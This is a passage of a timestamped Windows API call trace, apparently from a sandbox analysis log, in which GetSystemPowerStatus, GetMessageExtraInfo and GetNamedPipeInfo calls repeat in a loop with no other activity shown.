	[0129.301] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.301] GetMessageExtraInfo () returned 0x0
	[0129.301] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.301] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.301] GetMessageExtraInfo () returned 0x0
	[0129.302] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.302] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.302] GetMessageExtraInfo () returned 0x0
	[0129.302] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.302] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.302] GetMessageExtraInfo () returned 0x0
	[0129.303] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.303] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.303] GetMessageExtraInfo () returned 0x0
	[0129.303] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.303] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.303] GetMessageExtraInfo () returned 0x0
	[0129.385] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.385] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.385] GetMessageExtraInfo () returned 0x0
	[0129.385] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.385] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.385] GetMessageExtraInfo () returned 0x0
	[0129.386] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.386] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.386] GetMessageExtraInfo () returned 0x0
	[0129.387] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.387] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.387] GetMessageExtraInfo () returned 0x0
	[0129.387] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.387] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.387] GetMessageExtraInfo () returned 0x0
	[0129.388] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.388] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.388] GetMessageExtraInfo () returned 0x0
	[0129.396] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.396] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.396] GetMessageExtraInfo () returned 0x0
	[0129.397] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.397] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.397] GetMessageExtraInfo () returned 0x0
	[0129.398] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.398] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.398] GetMessageExtraInfo () returned 0x0
	[0129.398] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.398] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.398] GetMessageExtraInfo () returned 0x0
	[0129.399] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.399] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.399] GetMessageExtraInfo () returned 0x0
	[0129.406] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.406] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.406] GetMessageExtraInfo () returned 0x0
	[0129.407] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.407] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.407] GetMessageExtraInfo () returned 0x0
	[0129.407] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.407] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.407] GetMessageExtraInfo () returned 0x0
	[0129.408] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.408] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.408] GetMessageExtraInfo () returned 0x0
	[0129.410] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.410] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.410] GetMessageExtraInfo () returned 0x0
	[0129.411] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.411] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.411] GetMessageExtraInfo () returned 0x0
	[0129.411] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.411] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.411] GetMessageExtraInfo () returned 0x0
	[0129.412] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.412] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.412] GetMessageExtraInfo () returned 0x0
	[0129.413] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.413] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.413] GetMessageExtraInfo () returned 0x0
	[0129.414] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.414] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.414] GetMessageExtraInfo () returned 0x0
	[0129.415] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.415] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.415] GetMessageExtraInfo () returned 0x0
	[0129.415] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.415] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.415] GetMessageExtraInfo () returned 0x0
	[0129.416] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.416] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.416] GetMessageExtraInfo () returned 0x0
	[0129.417] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.417] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.417] GetMessageExtraInfo () returned 0x0
	[0129.418] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.418] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.418] GetMessageExtraInfo () returned 0x0
	[0129.419] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.419] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.419] GetMessageExtraInfo () returned 0x0
	[0129.419] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.419] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.419] GetMessageExtraInfo () returned 0x0
	[0129.420] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.420] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.420] GetMessageExtraInfo () returned 0x0
	[0129.421] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.421] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.421] GetMessageExtraInfo () returned 0x0
	[0129.421] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.421] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.421] GetMessageExtraInfo () returned 0x0
	[0129.422] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.422] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.422] GetMessageExtraInfo () returned 0x0
	[0129.423] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.423] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.423] GetMessageExtraInfo () returned 0x0
	[0129.437] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.437] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.437] GetMessageExtraInfo () returned 0x0
	[0129.438] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.438] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.438] GetMessageExtraInfo () returned 0x0
	[0129.466] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.466] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.466] GetMessageExtraInfo () returned 0x0
	[0129.466] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.466] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.466] GetMessageExtraInfo () returned 0x0
	[0129.485] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.485] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.485] GetMessageExtraInfo () returned 0x0
	[0129.485] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.485] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.485] GetMessageExtraInfo () returned 0x0
	[0129.486] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.486] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.486] GetMessageExtraInfo () returned 0x0
	[0129.486] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.486] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.486] GetMessageExtraInfo () returned 0x0
	[0129.487] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.487] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.487] GetMessageExtraInfo () returned 0x0
	[0129.488] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.488] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.488] GetMessageExtraInfo () returned 0x0
	[0129.489] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.489] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.489] GetMessageExtraInfo () returned 0x0
	[0129.489] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.489] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.490] GetMessageExtraInfo () returned 0x0
	[0129.490] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.490] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.490] GetMessageExtraInfo () returned 0x0
	[0129.491] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.491] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.491] GetMessageExtraInfo () returned 0x0
	[0129.492] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.492] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.492] GetMessageExtraInfo () returned 0x0
	[0129.492] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.492] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.492] GetMessageExtraInfo () returned 0x0
	[0129.493] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.493] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.493] GetMessageExtraInfo () returned 0x0
	[0129.495] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.495] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.495] GetMessageExtraInfo () returned 0x0
	[0129.498] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.498] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.498] GetMessageExtraInfo () returned 0x0
	[0129.499] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.499] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.499] GetMessageExtraInfo () returned 0x0
	[0129.499] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.499] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.499] GetMessageExtraInfo () returned 0x0
	[0129.500] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.500] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.500] GetMessageExtraInfo () returned 0x0
	[0129.500] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.500] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.500] GetMessageExtraInfo () returned 0x0
	[0129.501] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.501] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.501] GetMessageExtraInfo () returned 0x0
	[0129.501] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.501] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.501] GetMessageExtraInfo () returned 0x0
	[0129.502] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
